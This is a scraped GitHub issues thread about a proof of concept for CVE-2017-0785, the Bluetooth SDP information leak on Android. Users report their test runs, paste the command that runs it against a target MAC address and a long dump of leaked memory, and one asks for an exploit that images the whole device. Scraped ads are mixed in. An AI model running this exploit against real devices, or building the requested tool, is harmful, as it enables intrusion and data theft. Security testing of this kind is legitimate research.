ojasookert / cve-2017-0785 Goto Github PK

I'm testing the poc with Kali on a Nexus 5 and a Samsung s7.
The execution hangs on the sock.recv() because the first SDP response from the device is larger than the set MTU and the bluetooth module drops the packet.
here you can find the wireshark's capture of the bluetooth traffic.
mtu.zip

Samsung s7 Android version 6.0.1, security patch november 2016, kernel version: 3.18.14-9519568
Nexus 5 Android 5.0.1, build LRX22C

Hi, great job there , are you planning to or know anyone who has written a similar exploit for the cve-2017-0785 vulnerability?

Can you make an an exploit script or app for the CVE. It is an out of bounds read one and should have options to aquire the full filesystem or image the entire device. This is useful for backup of the filesystem before bootloader unlock. This will also be useful for law enforcement to solve murder mysteries and for an average dude to backup his device.

WPS Office: Complete office suite with PDF editor

Here's the link to the file:
https://us.docworkspace.com/d/sIH7Nk4_TAeH0kKUG

Get WPS Office for PC:
https://www.wps.com/d/?from=t

I used your poc. Get the information, but I do not understand the stack overflow, but do not know Andrews, can you help me
, Because I saw this article https://paper.seebug.org/430,
The return value is as follows

root@kali:~/bluet/CVE-2017-0785# python CVE-2017-0785.py TARGET=4C:49:E3:5D:8A:BF
[+] Exploit: Done
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
*
00000050 00 00 00 00 cd 80 08 c0 dc a5 12 18 ff ff ff fc │····│····│····│····│
00000060 e9 84 ae f5 e9 61 24 68 e9 61 18 c0 ff ff ff fc │····│·a$h│·a··│····│
00000070 e9 84 63 f5 e0 3c b3 00 cd 80 b8 00 e9 61 1f f8 │··c·│·<··│····│·a··│
00000080 dc a5 12 18 b7 9a b0 fc cd 9f 32 88 cd 9f 32 90 │····│····│··2·│··2·│
00000090 e8 0d f4 c4 00 00 03 f4 cd 9f 33 48 00 02 00 01 │····│····│··3H│····│
000000a0 00 00 01 00 00 00 00 13 e9 83 76 45 ff ff ff ff │····│····│··vE│····│
000000b0 e9 61 18 c0 00 00 00 00 00 00 00 00 2b 24 ad ec │·a··│····│····│+$··│
000000c0 00 00 00 0a 00 0f 42 40 00 0f 42 40 00 00 00 00 │····│··B@│··B@│····│
000000d0 2b 24 ad ec 00 00 00 00 e8 0e e6 b0 00 00 00 00 │+$··│····│····│····│
000000e0 00 4b 34 d3 00 00 00 00 00 00 00 00 00 00 03 e8 │·K4·│····│····│····│
000000f0 e8 0e e6 b0 00 00 75 30 00 00 00 00 00 00 00 0a │····│··u0│····│····│
00000100 e8 08 43 08 00 00 00 00 cd 86 64 78 cd 9f 33 10 │··C·│····│··dx│··3·│
00000110 b7 9a b0 fc e9 60 0b 38 ce 00 29 e4 00 00 00 02 │····│··8│··)·│····│ 00000120 e9 84 ae ab e9 60 05 c0 ce 00 29 e4 00 00 00 02 │····│···│··)·│····│
00000130 e9 84 76 1d dc a0 00 00 e9 60 05 c0 00 00 00 03 │··v·│····│···│····│ 00000140 dc a5 10 68 e9 60 05 c0 dc a5 10 68 e9 61 1e 38 │···h│···│···h│·a·8│
00000150 e9 61 19 c8 00 00 00 04 e9 87 a5 04 dc a5 15 10 │·a··│····│····│····│
00000160 e9 86 0c 6b e0 3c b3 00 e9 61 1e 70 e9 61 1e 58 │···k│·<··│·a·p│·a·X│
00000170 00 00 00 00 dc a4 e0 88 00 00 00 03 e9 61 18 c0 │····│····│····│·a··│
00000180 dc a5 10 00 ce 07 c0 20 dc a5 10 78 b7 9a b0 fc │····│··· │···x│····│
00000190 e8 1b a8 78 ce 07 c2 00 00 00 00 14 00 00 00 43 │···x│····│····│···C│
000001a0 e7 f5 10 1f cd 9f 33 90 b7 9a b0 fc 00 00 00 43 │····│··3·│····│···C│
000001b0 e8 06 e4 53 00 00 00 14 00 00 00 0f 00 00 00 00 │···S│····│····│····│
000001c0 e8 1b 93 4c b7 9a b0 fc dc a7 6b 80 00 00 00 43 │···L│····│··k·│···C│
000001d0 00 00 00 13 00 00 00 43 dc a7 6b a0 00 00 00 43 │····│···C│··k·│···C│
000001e0 dc a7 6b b0 e8 1b 93 4c e8 05 d1 85 00 00 00 0f │··k·│···L│····│····│
000001f0 dc a7 6b ac 00 00 00 43 e8 06 76 67 b7 9a b0 fc │··k·│···C│··vg│····│
00000200 00 00 00 00 ce 06 e2 4b 00 00 00 00 00 00 00 00 │····│···K│····│····│
00000210 e7 f5 10 1f cd 9f 34 00 b7 9a b0 fc e9 61 1d 88 │····│··4·│····│·a··│
00000220 e9 61 19 18 00 00 00 04 e9 87 a5 04 dc a5 14 d0 │·a··│····│····│····│
00000230 00 00 00 0f dc a7 6b e0 e9 61 1d c0 e9 61 1d a8 │····│··k·│·a··│·a··│
00000240 00 00 00 00 00 00 00 01 dc a5 5e 30 dc a4 e0 80 │····│····│··^0│····│
00000250 dc a4 e0 88 cd 9f 38 d8 00 00 00 00 cd 9f 34 b0 │····│··8·│····│··4·│
00000260 e9 85 93 23 cd 9f 38 d8 e8 06 36 45 ce 06 e3 30 │···#│··8·│··6E│···0│
00000270 e9 85 90 55 b7 9a b0 fc dc a5 5e 30 dc 61 7b 40 │···U│····│··^0│·a{@│
00000280 00 00 00 00 cd 9f 38 d8 e9 80 c5 71 00 00 00 01 │····│··8·│···q│····│
00000290 00 00 00 00 e1 b9 d4 bc b7 9a b0 fc cd 9f 38 d8 │····│····│····│··8·│
000002a0 e8 07 c2 8f b7 9a b0 fc dc a5 67 68 00 00 00 01 │····│····│··gh│····│
000002b0 e1 b9 d4 b0 cd 9f 38 d8 00 00 00 00 cd 9f 34 b0 │····│··8·│····│··4·│
000002c0 dc a5 67 60 e1 b9 d4 bc e8 07 b8 cf 00 00 00 01 │··g│····│····│····│ 000002d0 00 00 00 3e e1 b9 d4 b0 00 00 00 00 00 00 00 01 │···>│····│····│····│ 000002e0 cd 9f 34 d8 e1 b9 d4 b0 00 00 00 00 e8 0d 5d 22 │··4·│····│····│··]"│ 000002f0 cd 9f 38 ec 32 34 38 31 cd 9f 38 ec 5f 6e 75 72 │··8·│2481│··8·│_nur│ 00000300 65 72 68 74 20 3a 64 61 65 72 68 74 69 20 64 61 │erht│ :da│erht│i da│ 00000310 38 31 20 64 dc a0 1b c0 00 00 00 01 00 00 00 00 │81 d│····│····│····│ 00000320 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71 │eman│_tb │krow│ueuq│ 00000330 74 73 20 65 65 74 72 61 75 65 00 64 74 73 20 65 │ts e│etra│ue·d│ts e│ 00000340 dc a0 1c 14 00 00 00 64 00 00 00 00 00 00 00 00 │····│···d│····│····│ 00000350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000510 00 00 00 00 b7 9a b0 fc dc a0 00 00 e9 60 05 c0 │····│····│····│···│
00000520 00 00 00 51 00 00 00 51 e9 84 a3 1d 00 00 00 00 │···Q│···Q│····│····│
00000530 dc a0 00 00 00 00 00 10 e9 60 0a 88 e9 87 3c 00 │····│····│···│··<·│ 00000540 00 00 00 01 00 00 00 00 e9 84 69 d5 00 00 00 01 │····│····│··i·│····│ 00000550 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000560 00 00 00 00 00 00 00 00 00 00 00 00 dc a5 10 00 │····│····│····│····│ 00000570 e9 85 4a f9 00 00 00 00 00 00 00 00 00 00 00 02 │··J·│····│····│····│ 00000580 dc a4 e0 88 00 00 00 02 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000590 e9 85 4f 1b 00 00 00 00 00 00 10 00 e9 60 14 d8 │··O·│····│····│···│
000005a0 e9 87 3c 00 00 00 00 1f 00 00 00 01 e9 60 05 c0 │··<·│····│····│···│ 000005b0 dc a4 e0 88 dc a5 10 00 e9 84 6a 83 00 00 00 00 │····│····│··j·│····│ 000005c0 00 00 00 18 dc a4 e0 80 00 00 00 40 00 00 00 1f │····│····│···@│····│ 000005d0 00 00 10 00 dc a4 e0 88 e9 60 05 c0 00 00 00 00 │····│····│···│····│
000005e0 e9 84 70 35 00 00 00 01 00 00 00 00 00 00 00 00 │··p5│····│····│····│
000005f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000600 00 00 00 00 00 00 00 00 00 00 00 00 b7 9a b0 fc │····│····│····│····│
00000610 00 00 00 18 dc a4 e0 80 00 00 00 00 e1 b9 d2 d0 │····│····│····│····│
00000620 e9 61 19 70 dc a5 10 50 ff ff ff f0 00 00 00 04 │·a·p│···P│····│····│
00000630 e9 84 62 4b ff ff ff fc 00 00 00 00 e9 88 39 80 │··bK│····│····│··9·│
00000640 dc a4 e0 88 e9 88 39 7c e9 61 18 c0 e9 61 1d e0 │····│··9|│·a··│·a··│
00000650 00 00 00 00 dc a5 10 50 dc a5 10 50 00 00 00 02 │····│···P│···P│····│
00000660 dc a4 e0 88 00 00 00 18 dc a4 e0 80 00 00 00 18 │····│····│····│····│
00000670 e9 86 0e 71 00 00 00 00 00 00 00 00 00 00 00 18 │···q│····│····│····│
00000680 dc a5 10 00 00 00 00 02 e9 85 6e d1 00 00 00 02 │····│····│··n·│····│
00000690 cd 9f 38 70 cd 9f 38 01 cd 9f 38 70 cd 9f 39 20 │··8p│··8·│··8p│··9 │
000006a0 dc a4 e0 80 b7 9a b0 fc 00 00 00 18 e0 3c b3 20 │····│····│····│·<· │
000006b0 e8 07 cc 55 dc a5 67 60 dc 60 36 c4 00 00 00 5b │···U│··g│·6·│···[│
000006c0 00 00 47 fa e0 3c b3 20 e8 07 cc 55 00 00 03 4a │··G·│·<· │···U│···J│
000006d0 cd 9f 34 a8 cd 9f 34 b0 00 00 00 00 00 00 20 01 │··4·│··4·│····│·· ·│
000006e0 00 00 00 00 e1 b9 d2 88 b7 9a b0 fc 00 00 00 01 │····│····│····│····│
000006f0 e1 b9 d2 88 e1 b7 f4 70 00 00 00 00 dc 60 36 b8 │····│···p│····│·6·│ 00000700 dc 60 36 c4 e8 07 c8 65 e1 b7 f4 70 00 00 00 20 │·6·│···e│···p│··· │
00000710 e8 07 c8 f3 00 00 00 00 dc 60 36 c4 cd 9f 39 20 │····│····│·6·│··9 │ 00000720 e9 83 98 01 cd 9f 39 20 00 00 00 78 dc 60 36 bc │····│··9 │···x│·6·│
00000730 e9 83 98 19 cd 9f 39 28 e9 80 bf 97 00 00 00 78 │····│··9(│····│···x│
00000740 00 00 00 00 cd af 29 20 cd 7f f9 20 00 00 47 fa │····│··) │··· │··G·│
00000750 00 00 47 d6 00 00 00 00 cd 8f 50 00 00 0f e9 20 │··G·│····│··P·│··· │
00000760 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
00000770 00 00 00 00 e8 07 c8 65 e1 b7 f4 70 00 00 00 00 │····│···e│···p│····│
00000780 e8 22 b0 00 00 00 00 01 00 00 00 00 00 0f f0 00 │·"··│····│····│····│
00000790 00 00 00 00 cd 9f 39 70 cd 9f 39 20 00 00 00 20 │····│··9p│··9 │··· │
000007a0 00 00 00 00 00 00 00 00 b7 9a b0 fc 00 00 00 00 │····│····│····│····│
000007b0 00 00 00 00 00 00 00 00 00 00 00 01 dc a4 e0 80 │····│····│····│····│
000007c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
*
00000840 00 00 00 00 00 00 00 00 00 00 00 01 e1 ba 5f c0 │····│····│····│··_·│
00000850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│
*
00000b10 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····││
00000b1c

Traceback (most recent call last):
File "CVE-2017-0785.py", line 34, in
sock.send(packet(service_long, '\x00'))
File "CVE-2017-0785.py", line 16, in packet
pkt += p16(7 + len(continuation_state))
TypeError: can only concatenate str (not "bytes") to str

LeakValue Exploit for CVE-2022-20452, privileg @codekk AndroidOpen Source Website https://p.codekk.com/detail/Android/michalbednarski/LeakValue

Share From App: Dev Tools(Android Developer Tools)

It is not clear to me whether the exploit failed of succeeded. I do notice that on some devices the stack always seems to have a couple of characters at the end that are similar, but other than that, I don't know.

EDIT

After some puzzling, I worked out that the strings on the end say sth like:
thread id 81 95,
thread name bt_workqueue started